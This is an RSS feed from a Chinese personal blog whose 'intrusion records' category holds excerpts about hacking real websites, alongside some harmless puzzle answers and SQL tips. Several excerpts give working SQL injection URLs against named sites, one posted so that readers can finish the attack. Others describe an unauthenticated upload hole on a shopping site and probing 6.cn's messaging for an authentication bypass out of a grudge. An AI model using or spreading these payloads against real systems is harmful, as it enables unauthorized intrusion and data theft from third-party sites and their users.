<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>wolfeng's blog - 入侵实录</title><link>http://www.seeknot.com/blog/</link><description>wolfeng - </description><generator>RainbowSoft Studio Z-Blog 1.8 Spirit Build 80722</generator><language>zh-CN</language><copyright>Copyright seeknot.com. Some Rights Reserved.</copyright><pubDate>Fri, 10 Sep 2010 04:01:47 +0800</pubDate><item><title>六间房的裂缝</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/103.html</link><pubDate>Fri, 11 Jul 2008 15:40:25 +0800</pubDate><guid>http://www.seeknot.com/blog/post/103.html</guid><description><![CDATA[<p>引子<br />世界上没有无缘无故的恨，也没有无缘无故的爱。这句话推而广之，世界上没有无缘无故的漏洞检测&mdash;&mdash;或许是因为对方的名号，或许是因为对方的软件版本，或许是你的一次随机扫描，但就在这随机中也包含了某种必然：那个对象一定是暗合了你的某些扫描规则，才被选中的。而我对六间房的检测，则缘起于他们承办的一个&ldquo;长城精灵拼图&rdquo;的<span class="t_tag" href="tag.php?name=%E6%B8%B8%E6%88%8F" onclick="tagshow(event)">游戏</span>。想了解具体恩怨的同志可以访问 <a target="_blank" href="http://www.seeknot.com/6windows/Sort.asp?SortID=9">http://www.seeknot.com/6windows/Sort.asp?SortID=9</a>，我就不再这里骗稿费了。总而言之，就是我在这个活动中受到了极大的不公平。她们承认了错误，却拒绝纠正错误，直到最后杳无音信。我跟他们联系的重要<span class="t_tag" href="tag.php?name=%E6%89%8B" onclick="tagshow(event)">手</span>段之一，就是站内信。我幻想某天打开站内信，看到他们迟到的回复&hellip;&hellip;<br /><br />站内信的身份认证漏洞<br />对待幻想，可以有两种态度。一种是任其幻灭，一种是主动实现。后者正是hacker精神的精髓所在。要想实现我上述的情景，就必须找到六间房可能存在的身份验证方面的漏洞，或者干脆找到管理员的密码。虽然我的懒散一直在找借口：&ldquo;这么大的网站会存在这么重大的漏洞吗？&rdquo; 但是我的习惯还是让我打开了WSockExpert，同时耳边响起天下无贼里黎叔的台词：我想试试。<br />首先，我用wolfengster这个id向我新注册的6windows的id发送了一条站内信，标题是test，内容是 test by wolfeng，用WSockExpert监听的详细数据包如下：</p>]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/103.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=103</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=103&amp;key=467ef0c5</trackback:ping></item><item><title>微软密码风暴答案 （全）</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/102.html</link><pubDate>Mon, 02 Jun 2008 12:02:35 +0800</pubDate><guid>http://www.seeknot.com/blog/post/102.html</guid><description><![CDATA[<p>&nbsp;</p><p>第七关是靠这个文章才过去的，转贴过来：<a title="http://219.239.88.88/mspuzzle/" href="http://219.239.88.88/mspuzzle/"><font color="#999999"><br />http://219.239.88.88/mspuzzle/</font></a></p><p>开始游戏钱别忘了输入你的mail，以便参与最后抽奖，奖品好像有笔记本什么的，还算丰厚。好了开始游戏了。</p><p>第一题：</p><p><a href="http://www.grick.net/wp-content/uploads/2008/05/111.jpg"><img style="border-top-width: 0px; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="125" alt="111" width="244" border="0" src="http://www.grick.net/wp-content/uploads/2008/05/111-thumb.jpg" /></a></p><p>解答：提示有两个，第一：密码不是数字；第二：笔记本很难做出答案。有了这两提示就简单了，我们会想笔记本和台式机哪里不同？貌似键盘小了个尺寸，对。是小键盘。所以把上面的数字在小键盘里比划吧！再想密码不是数字，那肯定是字母了。所以<a class="internal_tag" title="Posts tagged with 答案" rel="tag" href="http://www.grick.net/archives/tag/%e7%ad%94%e6%a1%88"><font color="#999999">答案</font></a>是：<strong>CODE</strong></p><p>第二题：</p><p><br /><a href="http://www.grick.net/wp-content/uploads/2008/05/22222.jpg"><img style="border-top-width: 0px; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="124" alt="22222" width="244" border="0" src="http://www.grick.net/wp-content/uploads/2008/05/22222-thumb.jpg" /></a></p><p>解答：提示为&ldquo;二进制转换为十进制&rdquo;所以首先将以上二进制转换为 207.46.192.254，转换后发现为IP地址，联系提示是公司的名称，可以想到便是<a class="internal_tag" title="Posts tagged with 微软" rel="tag" href="http://www.grick.net/archives/tag/%e5%be%ae%e8%bd%af"><font color="#999999">微软</font></a>了，将IP输入地址栏，果然是<a class="internal_tag" title="Posts tagged with microsoft" rel="tag" href="http://www.grick.net/archives/tag/microsoft"><font color="#999999">microsoft</font></a>，所以<a class="internal_tag" title="Posts tagged with 答案" rel="tag" href="http://www.grick.net/archives/tag/%e7%ad%94%e6%a1%88"><font color="#999999">答案</font></a>便是：<strong>microsoft</strong></p>]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/102.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=102</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=102&amp;key=f42e2b5d</trackback:ping></item><item><title>关于门萨的未完成注入</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/89.html</link><pubDate>Sat, 08 Sep 2007 14:45:37 +0800</pubDate><guid>http://www.seeknot.com/blog/post/89.html</guid><description><![CDATA[昨天看到鲁豫有约里采访几个中国的门萨成员，之后一时无聊，去了她们的官网，程序上有漏洞，但是却猜不到表名，load_file不到绝对路径而停滞不前，最大的无奈莫过于此，或许有人能猜到他的用户表吧，把注入点贴出来：http://www.mensa.org/nationalinfo.php?country=19%20and%201=2%20union%20select%201,user(),database(),4,5,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1<br/>]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/89.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=89</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=89&amp;key=1f1d38ee</trackback:ping></item><item><title>易才网的漏洞</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/58.html</link><pubDate>Thu, 27 Apr 2006 13:24:45 +0800</pubDate><guid>http://www.seeknot.com/blog/post/58.html</guid><description><![CDATA[前几天去应聘易才网的项目经理，他们让我写一个对易才网的个人意见。本来不想写了，不过经不住那边催促，勉强写了一篇，大部分的篇幅是对一个隐藏得比较深的漏洞的描述，昨天看的时候他们已经改了程序（这不代表就没了漏洞），所以把报告贴出来：<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;总体来说，易才网结构合理，相应的电话确认用户身份的服务也很到位，我主要说几个问题，提几个建议。<br>问题一：冗余数据错乱<br>典型表现：http://augustsummer.blog.job1998.com/blog/index.asp<br>在该blog内的不同栏目里先后出现了&nbsp;郭先生的个人空间&nbsp;，郭小姐的个人空间，郭川的个人空间&nbsp;三个称谓。]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/58.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=58</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=58&amp;key=572ec5bb</trackback:ping></item><item><title>最短的asp病毒</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/42.html</link><pubDate>Fri, 03 Feb 2006 18:26:53 +0800</pubDate><guid>http://www.seeknot.com/blog/post/42.html</guid><description><![CDATA[这是我去年5月份写的，今天归整到这里：<br>歇完长假第一天上班，被通知说公司的网站发现被攻击的痕迹，证据是诺顿的隔离区里发现若干病毒文件，用pcanywhere连上web一看，隔离区里躺着几个upload.inc文件，这不是我们大家广为传用的无惧上传类吗，我的bbs和涉及到无组件上传的地方都用他，无惧啊，挺好的，用了无惧，还真对得起咱这张脸（大宝广告毒害后遗症）。<br>打开bbs目录，果然upload.inc被杀掉了，在看一下诺顿的版本，5月4号升的级，看来是在upload.inc里包含了诺顿新命名的病毒特征码，无惧，我所欲也，诺顿亦我所欲也，只有改这个inc文件了，最初的做法比较速成，下了一个asp免杀工具，然后把upload.inc加密，再copy到web下，没有被查杀，正得意之时，又被人告知说上传功能仍无法使用，一看报错信息：page重复定义——原来如此，我的上传页面里包含了conn.asp&nbsp;和upload.inc等文件，&nbsp;conn.asp的第一行：<br>&lt;%@LANGUAGE=&quot;VBSCRIPT&quot;%&gt;<br>而upload.inc加密后也必定包含]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/42.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=42</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=42&amp;key=150e188b</trackback:ping></item><item><title>利用seeknot入侵的一个实例</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/39.html</link><pubDate>Fri, 30 Dec 2005 14:39:05 +0800</pubDate><guid>http://www.seeknot.com/blog/post/39.html</guid><description><![CDATA[今天朋友给我一个卖保健品的网站，据说提交订单失效，疑似诈骗行为，遂查之。<br>&nbsp;&nbsp;&nbsp;1、输入网址：http://www.bjp**.com，基本的安全做的不错，不存在简单的注入点，极有可能是一套开源的代码。<br>&nbsp;&nbsp;&nbsp;2、登陆www.seeknot.com,利用其源码目录的查询功能反向查找源码名称，该网站有一新闻页面是：dongtai.asp，在www.seeknot.com输入dongtai.asp，列出6项源码，具体列表见：http://www.seeknot.com/result.asp?key=dongtai.asp&amp;selected=1。<br>&nbsp;&nbsp;&nbsp;3、进一步查询：该源码还有一页名称是fk.asp，在www.seeknot.com中输入fk.asp，其结果更上次结果取交集，确认源码为：秋叶购物商城V5.0(前台+后台演示+BBS)&nbsp;，版本可能有出入。该源码的详细目录列表见：http://www.seeknot.com/showlist.asp?id=599<br>&nbsp;&nbsp;&nbsp;4、下载秋叶购物系统源码，察看几个容易出现安全漏洞的关键点，发现存在类似动网6.0的上传漏洞，并且上传页面没有身份检测，即不用登陆，即可操作，上传页面为：http://www.bjp**.com/upload_flash.asp?formname=myform&amp;editname=bookpic&amp;uppath=bookpic&amp;filelx=jpg。]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/39.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=39</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=39&amp;key=37a967d0</trackback:ping></item><item><title>我的变态注入</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/26.html</link><pubDate>Mon, 11 Oct 2004 16:53:37 +0800</pubDate><guid>http://www.seeknot.com/blog/post/26.html</guid><description><![CDATA[今天我自虐的对一处sql注入点进行注入,把最后的一个注入贴出来,比较变态:<br>http://club.cinews.net/stock/stockdetail.asp?stockname=跑马地&#39;&#39;and%20(Select%20Top%201%20name%20from%20sysobjects%20where%20xtype=char(85)%20and%20status&gt;0%20%20and%20name&lt;&gt;%27%65%63%61%72%64%6D%65%73%73%61%67%65%27%20and%20name&lt;&gt;%27%61%71%5F%73%63%6F%72%65%27%20and%20name&lt;&gt;%27%42%61%64%4C%69%73%74%27%20and%20name&lt;&gt;%27%42%61%6E%6B%55%73%65%72%4C%69%73%74%27%20and%20name&lt;&gt;%27banzhu%27%20and%20name&lt;&gt;%27card%27%20and%20name&lt;&gt;%27cdd_score%27%20and%20name&lt;&gt;%27chess_score%27%20and%20name&lt;&gt;%27cyfd%27%20and%20name&lt;&gt;%27dahu%27%20and%20name&lt;&gt;%27ddz_score%27%20and%20name&lt;&gt;%27ecard%27%20and%20name&lt;&gt;%27ecardlead%27%20and%20name&lt;&gt;%27face%27%20and%20name&lt;&gt;%27facelist%27%20and%20name&lt;&gt;%27friend%27%20and%20name&lt;&gt;%27friendlist%27%20and%20name&lt;&gt;%27geter%27%20and%20name&lt;&gt;%27gift%27%20and%20name&lt;&gt;%27goodslist%27%20and%20name&lt;&gt;%27guesslist%27%20and%20name&lt;&gt;%27gupiaoconfig%27%20and%20name&lt;&gt;%27gz_score%27%20and%20name&lt;&gt;%27job%27%20and%20name&lt;&gt;%27jq_score%27%20and%20name&lt;&gt;%27kehu%27%20and%20name&lt;&gt;%27message%27%20and%20name&lt;&gt;%27mj_score%27%20and%20name&lt;&gt;%27movice%27%20and%20name&lt;&gt;%27news%27%20and%20name&lt;&gt;%27pdk_score%27%20and%20name&lt;&gt;%27propertys%27%20and%20name&lt;&gt;%27sgjq_score%27%20and%20name&lt;&gt;%27stock%27%20and%20name&lt;&gt;%27stockbuylist%27%20and%20name&lt;&gt;%27stocklist%27%20and%20name&lt;&gt;%27stocknews%27%20and%20name&lt;&gt;%27sysmsg%27%20and%20name&lt;&gt;%27tlj_score%27%20and%20name&lt;&gt;%27user8%27%20and%20name&lt;&gt;%27userinfo%27%20and%20name&lt;&gt;%27users%27%20and%20name&lt;&gt;%27wq_score%27%20and%20name&lt;&gt;%27wzq_score%27%20and%20name&lt;&gt;%27xq_score%27%20and%20name&lt;&gt;%27yuelao%27)&gt;0%20;--<br><br>说明一下:上面注入是探测sql内的所有数据表,型如and&nbsp;name&nbsp;&lt;&gt;%27card%27&nbsp;之类的东西,是我一步一步的加的,加一个出一个表,呵呵,比较笨,笨死了,但是我喜欢.]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/26.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=26</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=26&amp;key=db5a7301</trackback:ping></item><item><title>sql中的一个私人案例（to 小邵）</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/25.html</link><pubDate>Fri, 08 Oct 2004 13:38:01 +0800</pubDate><guid>http://www.seeknot.com/blog/post/25.html</guid><description><![CDATA[功能：把test表中缺失的identity属性加上。<br>思路：把test表数据写如临时表，然后删除test表，重建test表，设置test的identity_insert为on，然后把临时表的数据导入test，直接在查询分析器了执行即可，呵呵。<br>select&nbsp;distinct&nbsp;*&nbsp;into&nbsp;#Tmp&nbsp;from&nbsp;test<br>drop&nbsp;table&nbsp;test<br>CREATE&nbsp;TABLE&nbsp;test&nbsp;(]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/25.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=25</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=25&amp;key=3fc85fb5</trackback:ping></item><item><title>identity的一个操作</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/24.html</link><pubDate>Fri, 08 Oct 2004 11:27:40 +0800</pubDate><guid>http://www.seeknot.com/blog/post/24.html</guid><description><![CDATA[A.&nbsp;如有必要，重置当前标识值<br>下例在必要的情况下重置&nbsp;jobs&nbsp;表的当前标识值。<br><br>USE&nbsp;pubs<br>GO]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/24.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=24</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=24&amp;key=52971a0b</trackback:ping></item><item><title>俺的sql注入程序</title><author>web-wind@163.com (wolfeng)</author><link>http://www.seeknot.com/blog/post/22.html</link><pubDate>Tue, 28 Sep 2004 09:13:19 +0800</pubDate><guid>http://www.seeknot.com/blog/post/22.html</guid><description><![CDATA[<p>差不多两年前，sql&nbsp;injection刚刚浮出水面的时候，我用asp写了一个探测敏感字符串的冬冬，挂在我的网站上四处注入，虽然简陋，却立功无数。如今大量的sql&nbsp;注入工具相继问世，我也该把这段注入代码贴出来而无须敝帚自珍了，^_^。<br />&nbsp;&nbsp;&nbsp;&nbsp;思路很简单，建立对象Microsoft.XMLHTTP，通过它的send方法发送请求，通过responseBody判断返回的页面信息来完成对字符串的猜测，&nbsp;<br />需要注意的是通常我么访问的网页上有字母也有汉字，所以要对返回信息处理一下，写一个byte2BSTR函数：<br /><br />Function&nbsp;bytes2BSTR(vIn)</p>]]></description><category>入侵实录</category><comments>http://www.seeknot.com/blog/post/22.html#comment</comments><wfw:comment>http://www.seeknot.com/blog/</wfw:comment><wfw:commentRss>http://www.seeknot.com/blog/feed.asp?cmt=22</wfw:commentRss><trackback:ping>http://www.seeknot.com/blog/cmd.asp?act=tb&amp;id=22&amp;key=319e37bd</trackback:ping></item></channel></rss>
